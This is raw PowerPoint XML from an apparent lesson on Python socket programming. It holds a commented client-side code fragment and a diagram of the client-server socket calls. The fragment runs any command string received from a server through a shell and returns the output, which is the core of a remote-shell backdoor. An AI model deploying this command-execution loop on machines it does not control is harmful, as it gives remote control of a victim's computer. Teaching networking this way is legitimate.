              <a:t>    if data[:2].decode("utf-8") == "cd":</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0" err="1"/>
              <a:t>os.chdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>(data[3:].decode("utf-8")) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#checks character from 3 position after cd like 'cd ..' or cd "DELL"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>    if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0" err="1"/>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>(data) &gt; 0:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#Popen() opens the terminal to execute commands and decodes entire string entered in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        # shell property enables access to shell commands like dir.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t> = subprocess.Popen(data[:].decode("utf-8"),shell=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0" err="1"/>
              <a:t>True,stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0" err="1"/>
              <a:t>subprocess.PIPE,stdin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0" err="1"/>
              <a:t>subprocess.PIPE,stderr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0" err="1"/>
              <a:t>subprocess.PIPE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#now sending back to server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0" err="1"/>
              <a:t>output_byte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0" err="1"/>
              <a:t>cmd.stdout.read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>() + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0" err="1"/>
              <a:t>cmd.stderr.read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0" err="1"/>
              <a:t>output_str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t> = str(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0" err="1"/>
              <a:t>output_byte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>, "utf-8")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#while sending to server need to convert string to byte and also send </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> i.e. 'C:\Users\DELL&gt;'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0" err="1"/>
              <a:t>currentWD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0" err="1"/>
              <a:t>os.getcwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>() + "&gt; "</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0" err="1"/>
              <a:t>s.send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0" err="1"/>
              <a:t>str.encode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0" err="1"/>
              <a:t>output_str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0" err="1"/>
              <a:t>currentWD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>        print(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0" err="1"/>
              <a:t>output_str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#to print on clients computer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2464101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C7B8B4-29E0-4F54-9B6F-12FFE5266624}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1171852" y="355107"/>
            <a:ext cx="878890" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F16EBF4-CC1B-40C6-9DF7-2A2CC057C617}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1171852" y="724439"/>
            <a:ext cx="1083076" cy="2787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 socket()</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE5D7610-17BE-486A-A859-BD1B51C0B3B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1171852" y="1322773"/>
            <a:ext cx="1083076" cy="2787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Bind()</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D923F61-E240-430E-8230-B96E5C7FD69B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1171852" y="1921107"/>
            <a:ext cx="1083076" cy="2787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listen()</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF7D17E6-18F6-4E61-932E-3A7AFD8CD930}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1171852" y="2519441"/>
            <a:ext cx="1083076" cy="2787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accept()</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Arrow Connector 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3685A13-AE41-4886-A01E-5963E4B45365}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="5" idx="2"/>
            <a:endCxn id="6" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1713390" y="1003177"/>
            <a:ext cx="0" cy="319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C2D0E05-540A-4C53-9457-E691DB6C04DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1713390" y="1601511"/>
            <a:ext cx="0" cy="319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E718338-AC54-41D8-A77A-24460F7CCA26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1713390" y="2199845"/>
            <a:ext cx="0" cy="319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91DBB74-829A-4688-8CB3-DB22CE834EA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1713390" y="2798179"/>
            <a:ext cx="0" cy="264617"/>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81129F02-1C6B-429C-B253-43F98A0F03B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1096397" y="4309540"/>
            <a:ext cx="1766650" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Process request</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Straight Arrow Connector 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F29B87A-C37D-4D02-B694-D12FD7EC3CBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1714869" y="3515220"/>
            <a:ext cx="0" cy="319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4FB7095B-E68D-4478-8BC5-4F00A9801A87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1171852" y="3834816"/>
            <a:ext cx="1083076" cy="2787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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>read()</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Straight Connector 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF70F13B-CF90-4FD1-ABAC-477031C129F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1697114" y="4113554"/>
            <a:ext cx="0" cy="264617"/>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D4484EFB-004D-4F1D-9890-D31BA225EA99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1047561" y="2947165"/>
            <a:ext cx="1535838" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Block until there are connection from client</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDCBC20E-8062-4CED-8301-AB253C6E2895}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1171852" y="4862513"/>
            <a:ext cx="1083076" cy="2787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write()</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Straight Arrow Connector 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41820007-639F-4A5A-8E69-87F8FCA40C99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1713390" y="4542917"/>
            <a:ext cx="0" cy="319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F2A21E29-8183-4E10-B9DD-690E7F344C72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1171852" y="5490448"/>
            <a:ext cx="1083076" cy="2787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close()</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Straight Arrow Connector 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4926D8C3-6213-4AAE-8355-8454C385CCC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1713390" y="5170852"/>
            <a:ext cx="0" cy="319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1F6312C5-4458-4F45-A5AD-E91DE81F8F5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="798990"/>
            <a:ext cx="725968" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectangle 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80543B53-8F14-4798-9654-8832D5ABE57B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5904622" y="1189550"/>
            <a:ext cx="1083076" cy="2787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 socket()</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="Straight Arrow Connector 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEB39523-A555-4240-A20B-0FFA50EBF0B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="25" idx="2"/>
            <a:endCxn id="28" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6446160" y="1468288"/>
            <a:ext cx="0" cy="1708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4E5B524F-C3CD-4EBA-AFF1-D3A8F81F459F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5904622" y="3177128"/>
            <a:ext cx="1083076" cy="2787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connect()</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="30" name="Straight Arrow Connector 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E1AB582-128A-4630-9A30-65A5C19E8F69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2317072" y="3307619"/>
            <a:ext cx="3587551" cy="88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496CA18C-8F98-4586-A11A-343841E22C08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124937" y="3044525"/>
            <a:ext cx="2094420" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Connection establishment</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Rectangle 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDAF9A28-C503-44D6-907C-FDCCE7F78D76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5904622" y="3834816"/>
            <a:ext cx="1083076" cy="2787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write()</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="36" name="Straight Arrow Connector 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C1E5659-A0E0-4BF5-9DEE-1A496486F591}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="35" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6446160" y="3455866"/>
            <a:ext cx="0" cy="378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6667779-F1DA-43BA-B39C-0691A8E64570}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2317071" y="3947948"/>
            <a:ext cx="3587551" cy="88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FBD84E1A-4D29-4666-AFB7-5D25C4FAA818}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3445437" y="3666408"/>
            <a:ext cx="1232838" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Data (request)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Rectangle 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04B5924C-D334-4080-B80B-74A3946B1CFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5870082" y="4851185"/>
            <a:ext cx="1083076" cy="2787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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>read()</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="41" name="Straight Arrow Connector 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A37F13B-4BD7-439A-8492-993321E7A583}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="40" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6411620" y="4142153"/>
            <a:ext cx="0" cy="709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92F2337C-E918-4691-89D9-A299B89EFF38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="20" idx="3"/>
            <a:endCxn id="40" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2254928" y="4990554"/>
            <a:ext cx="3615154" cy="11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EECF314D-9B8F-47CB-B41B-7364DB731C31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429553" y="4749943"/>
            <a:ext cx="1042465" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
